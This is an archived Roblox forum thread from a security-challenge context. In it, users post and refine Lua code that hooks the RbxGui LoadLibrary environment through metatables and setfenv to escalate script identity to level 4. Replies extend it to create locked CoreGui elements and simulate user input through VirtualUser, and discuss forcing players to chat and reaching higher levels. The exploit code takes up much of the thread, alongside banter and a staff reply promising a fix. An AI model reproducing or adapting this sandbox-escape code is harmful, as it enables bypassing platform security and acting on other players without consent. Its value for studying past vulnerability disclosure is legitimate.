|
Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:12 PM |
I remembered how much fun metatables are. This script is able to steal level 4 context simple by being inserted into players via starterpack/startergui/loadinggui. Notably, it hooks into "CoreGui.RobloxGui.CurrentLoadout.CoreScripts/BackpackScripts/LoadoutScript" via "Script "RbxGui", Line 1611 - upvalue moveDragger"
-----------------------------------
hook = function()
printidentity()
print(pcall(function()
local t = Instance.new("Part",workspace)
t.Anchored=true
t.Name="EQ"
t.RobloxLocked=true
end))
end
local p = setmetatable({},{__index=function(t,i)
printidentity()
print(i)
if getfenv(0)[i] then
if type(getfenv(0)[i])=="function" and getfenv(0)[i]~=hook then
return hook
end
return getfenv(0)[i]
else
print("Nope")
end
end})
print("--"..math.random().."--")
local l = assert(LoadLibrary("RbxGui"))
for _,v in next,getfenv(l.CreateLoadingFrame) do
if type(v)=="function" then
local k = getfenv(l.CreateLoadingFrame)[_]
setfenv(k,p)
end
end
local hr = {"CreateDropDownMenu","CreateMessageDialog","CreatePropertyDropDownMenu","GetFontHeight","CreateScrollingFrame","AutoTruncateTextObject","CreateLoadingFrame"}
for v,i in next,hr do
setfenv(l[i],p)
end
Note that doing print(workspace.EQ.RobloxLocked) after it is hooked returns true, so it does in fact work.
I can has hat? |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:14 PM |
Does this mean we can once again do all the crazy h4x we did when the bytecode exploit came out? :D
---
We're all immortal. We're just stuck in full screen. - Corecii |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:14 PM |
>not level 6
it does have access to game.Players:Chat and robloxlocking, so you could potentially make players chat bad words regardless of if they want to or not =P |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:19 PM |
Oh, and since level 4 has access to virtualuser, I basically acomplished #3 too.
game:service("VirtualUser"):Button1Down(Vector3.new(1,1)) |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:24 PM |
Lets see here...
hook = function()
printidentity() --level 4, close enough I hope.
print(pcall(function()
local t = Instance.new("Part",workspace)
t.Anchored=true
t.Name="EQ"
t.RobloxLocked=true
Gui=Instance.new("GuiMain")
Gui.Name="Que"
Gui.Parent=game:service("CoreGui")
Central=Instance.new("Frame")
Central.Name="Frame"
Central.Parent=Gui
Central.Position=UDim2.new(0,0,0,0)
Central.Size=UDim2.new(1, 0, 1, 0)
Central.BackgroundColor3=Color3.new(100,100,100)
Central.BackgroundTransparency=0.5
Central.BorderColor3=BrickColor:Black().Color
Central.BorderSizePixel=1
Central.SizeConstraint=Enum.SizeConstraint.RelativeXY
Central.ZIndex=9
Central.RobloxLocked=true --Check #1
game:service("VirtualUser"):Button1Down(Vector2.new(1,1)) --Check #3
end))
end
local p = setmetatable({},{__index=function(t,i)
printidentity()
print(i)
if getfenv(0)[i] then
if type(getfenv(0)[i])=="function" and getfenv(0)[i]~=hook then
return hook
end
return getfenv(0)[i]
else
print("Nope")
end
end})
print("--"..math.random().."--")
local l = assert(LoadLibrary("RbxGui"))
for _,v in next,getfenv(l.CreateLoadingFrame) do
if type(v)=="function" then
local k = getfenv(l.CreateLoadingFrame)[_]
setfenv(k,p)
end
end
local hr = {"CreateDropDownMenu","CreateMessageDialog","CreatePropertyDropDownMenu","GetFontHeight","CreateScrollingFrame","AutoTruncateTextObject","CreateLoadingFrame"}
for v,i in next,hr do
setfenv(l[i],p)
end |
|
|
| Post ReplyReport Abuse |
|
 Zewl
|
  |
| Joined: 29 Nov 2008 |
| Total Posts: 446 |
|
| |
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:28 PM |
| ..And this proves to me that I need to get back into LUA. |
|
|
| Post ReplyReport Abuse |
|
DannyCore
|
  |
| Joined: 25 Apr 2012 |
| Total Posts: 887 |
|
| |
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:29 PM |
| pretty much you owned us by 250 dollars |
|
|
| Post ReplyReport Abuse |
|
1waffle1
|
  |
| Joined: 16 Oct 2007 |
| Total Posts: 12741 |
|
| |
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:29 PM |
@zewl
start out by learning what it's called. |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:29 PM |
Step 1: Relearn name.
---
The problem with making computers complete idiots can use is you have complete idiots using computers. |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:31 PM |
| Note:If level 4 isn't high enough, I could re-insert a StarterScript (level 5), which would then re-trigger the hook since it is authenticated for CoreScripts' assetid. |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:32 PM |
Link to my place to prove the coregui works, which I am doing via the level 4 hook above.
http://www.roblox.com/Hack-week-submission-place?id=33053738 |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:41 PM |
| I just tried it and it acted as if I was using a regular LocalScript, giving errors and whatnot about me accessing the CoreGui and VirtualUser. Btw, you need level 7 for the money. I'm fairly certain that level 7 isn't even usable and they said that just to get people like you to post "close enough?" and give them a free hack. |
|
|
| Post ReplyReport Abuse |
|
Zewl
|
|
| Joined: 29 Nov 2008 |
| Total Posts: 446 |
|
| |
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:41 PM |
@Waffle
I used to frequent ROBLOX a lot - I'm fully capable of using LUA as well as PHP, JS, HTML, CSS, Batch, UNIX and some Java. I was commenting on how I want to start using LUA again. I am fully competent.
Please, do try and be less condescending in the future. |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:41 PM |
Ladies and gentlemen, I now present to you: The winner of life.
RenderSettings, +1 respect. Excellent work. |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:43 PM |
"I used to frequent ROBLOX a lot - I'm fully capable of using LUA as well as PHP, JS, HTML, CSS, Batch, UNIX and some Java. I was commenting on how I want to start using LUA again. I am fully competent."
You're evidently not competent enough to understand that "Lua" (the programming language) is not an acronym. |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:43 PM |
@Zewl
And yet this entire time you spell it "LUA". It is not an acronym and should not be used like one; it is spelled "Lua". |
|
|
| Post ReplyReport Abuse |
|
jode6543
|
  |
| Joined: 16 Jun 2009 |
| Total Posts: 4835 |
|
| |
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:43 PM |
Dangit, stop being smart. I wanted that. D:
.. Not that I ever expected to get it. I'm good at the use-it-for-something-it-wasn't-meant-for hacks, not bypass-security hacks.
[[There is no place like ~]] |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:44 PM |
| Arceus: Since the hack depends that your HTTP get for the linked source is slow enough it can inject into LoadLibrary first, it might not work if you have a super fast connection. Did you visit my place,or put it in StarterGui/StarterKit/loadinggui? |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:49 PM |
"Arceus: Since the hack depends that your HTTP get for the linked source is slow enough it can inject into LoadLibrary first, it might not work if you have a super fast connection. Did you visit my place,or put it in StarterGui/StarterKit/loadinggui?"
I was running a local server. Thanks. |
|
|
| Post ReplyReport Abuse |
|
Zewl
|
|
| Joined: 29 Nov 2008 |
| Total Posts: 446 |
|
| |
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:49 PM |
@Dr and Absolute
It's 00:45 as I'm writing this. I haven't used Lua in a while, and I forgot that it wasn't an acronym unlike so many other languages. Please don't eat me; I'm tired, I made a mistake. |
|
|
| Post ReplyReport Abuse |
|
| |
| |
Zewl
|
|
| Joined: 29 Nov 2008 |
| Total Posts: 446 |
|
| |
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 06:55 PM |
Shall I just go and hide in the web developer corner?
Yeah, I think I might do that. |
|
|
| Post ReplyReport Abuse |
|
 Sorcus
|
  |
 |
| Joined: 29 Nov 2010 |
| Total Posts: 3454 |
|
| |
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 07:19 PM |
@RenderSettings, Ha, I expected this :) So - we have done something special to stop this. No more patching after it happens. Will give details after it's ready :)
~Sorcus |
|
|
| Post ReplyReport Abuse |
|
|
Re: Sorcus: More on LoadLibrary
Posted: 13 Dec 2012 07:25 PM |
So no more context-is-defined-by-the-function-invoker? That's good.
Still, not sure how you will seperate the security levels! Good luck!
*psst. i can has moony/hat* |
|
|
| Post ReplyReport Abuse |
|
